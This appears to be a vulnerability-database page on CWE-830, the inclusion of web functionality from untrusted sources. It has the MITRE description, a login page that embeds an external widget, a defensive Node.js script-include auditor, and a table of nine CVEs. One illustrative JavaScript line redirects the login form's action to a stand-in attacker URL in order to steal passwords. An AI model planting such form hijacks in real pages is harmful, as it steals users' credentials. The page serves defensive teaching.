
CWE-830 (Inclusion of Web Functionality from an Untrusted Source) — Vulnerability Class 9

9 vulnerabilities classified as CWE-830 (Inclusion of Web Functionality from an Untrusted Source). AI analysis in Chinese included.

CWE-830 is a critical security weakness in which an application integrates web functionality, such as widgets or scripts, from an untrusted external domain. It typically arises when developers embed third-party code without adequate isolation, so the external source executes within the application's own security context. Attackers exploit this by compromising the untrusted source or injecting malicious code into it, gaining unauthorized access to sensitive data and session tokens, or full control over the application's interface and logic. To mitigate the risk, developers should enforce a strict content security policy, use sandboxing techniques such as iframes with restrictive attributes, and validate every external source. Regular audits of third-party dependencies and strict cross-origin resource sharing policies further help keep external functionality isolated so it cannot compromise the integrity of the primary application.

MITRE CWE Description
The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source. Including third-party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted. Even if the third party is a trusted source, the product may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the product. This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For example, JavaScript-based web widgets may be inserted by using '<SCRIPT SRC="http://other.domain.here">' tags, which causes the code to run in the domain of the product, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access. Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists.
Common Consequences (1)
Confidentiality, Integrity, Availability: Execute Unauthorized Code or Commands
Examples (1)
This login webpage includes a weather widget from an external website:

Bad · HTML

    <div class="header">
      Welcome!
      <div id="loginBox">
        Please Login:
        <form id="loginForm" name="loginForm" action="login.php" method="post">
          Username: <input type="text" name="username" /> <br/>
          Password: <input type="password" name="password" />
          <input type="submit" value="Login" />
        </form>
      </div>
      <div id="WeatherWidget">
        <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script>
      </div>
    </div>

Attack · JavaScript (the widget script runs in the login page's own origin, so it can rewrite the form's action)

    ...Weather widget code....
    document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
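As an added example (not part of the MITRE entry or of this page), a small Node.js checker that audits every `<script src>` in a document and flags the CWE-830 pattern: a cross-origin script that carries no Subresource Integrity hash or is not covered by the page's CSP script-src allowlist. The sample HTML, page URL and allowlist are constructed, and CSP matching is simplified to exact origins. Note that relative references resolve against the page, so a scheme-less src like the one in the MITRE snippet above is treated by a browser as a same-origin path, which the checker reports rather than flags.

```javascript
// Added example: static audit of script includes for the CWE-830 pattern.
// SAMPLE_HTML, PAGE_URL and CSP_SCRIPT_SRC are constructed test data.

const PAGE_URL = "https://login.example.org/login";
const CSP_SCRIPT_SRC = ["'self'", "https://cdn.example.org"];
const SAMPLE_HTML = `
<div id="WeatherWidget">
  <!-- scheme-less: resolves to a path under the page's own origin -->
  <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script>
  <!-- genuine remote include, no integrity hash, not in the CSP allowlist -->
  <script src="https://externaldomain.example.com/weatherwidget.js"></script>
  <!-- remote include pinned by SRI and allowlisted (hash value is a placeholder) -->
  <script src="https://cdn.example.org/lib.js"
          integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
</div>`;

function auditScriptIncludes(html, pageUrl, cspScriptSrc) {
  const pageOrigin = new URL(pageUrl).origin;
  // Simplified CSP model: 'self' and exact origins only (no wildcards, no nonces).
  const allowed = new Set(
    cspScriptSrc.map((s) => (s === "'self'" ? pageOrigin : new URL(s).origin))
  );
  const findings = [];
  const scriptTag = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const tag = m[0];
    // Resolve exactly as a browser would: relative refs are same-origin paths.
    const url = new URL(m[1], pageUrl);
    const crossOrigin = url.origin !== pageOrigin;
    const hasIntegrity = /\bintegrity\s*=/i.test(tag);
    const allowedByCsp = allowed.has(url.origin);
    findings.push({
      src: url.href,
      crossOrigin,
      hasIntegrity,
      allowedByCsp,
      // Risky: code from another origin that is neither hash-pinned nor allowlisted.
      risky: crossOrigin && (!hasIntegrity || !allowedByCsp),
    });
  }
  return findings;
}

for (const f of auditScriptIncludes(SAMPLE_HTML, PAGE_URL, CSP_SCRIPT_SRC)) {
  console.log(f.risky ? "RISKY " : "ok    ", f.src);
}
```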
| CVE ID | Title | Product | CVSS | Severity | Published |
| --- | --- | --- | --- | --- | --- |
| CVE-2025-65109 | Minder does not sandbox http.send in Rego programs | minder | 4.3 | - | 2025-11-21 |
| CVE-2025-46652 | IZArc security vulnerability | IZArc | 6.1 | Medium | 2025-04-26 |
| CVE-2025-43703 | Anki security vulnerability | Anki | 6.1 | Medium | 2025-04-16 |
| CVE-2025-33027 | Bandisoft Bandizip security vulnerability | Bandizip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33026 | PeaZip security vulnerability | PeaZip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33028 | WinZip security vulnerability | WinZip | 6.1 | Medium | 2025-04-15 |
| CVE-2024-35180 | OMERO.web JSONP callback vulnerability | omero-web | 6.1 | Medium | 2024-05-21 |
| CVE-2023-2588 | Teltonika Remote Management System security vulnerability | Remote Management System | 8.8 | High | 2023-05-22 |
| CVE-2021-28162 | Eclipse Theia injection vulnerability | Eclipse Theia | 6.1 | - | 2021-03-12 |

Vulnerabilities classified as CWE-830 (Inclusion of Web Functionality from an Untrusted Source) account for 9 CVEs. The CWE taxonomy describes the weakness; review the individual CVEs for product-specific impact.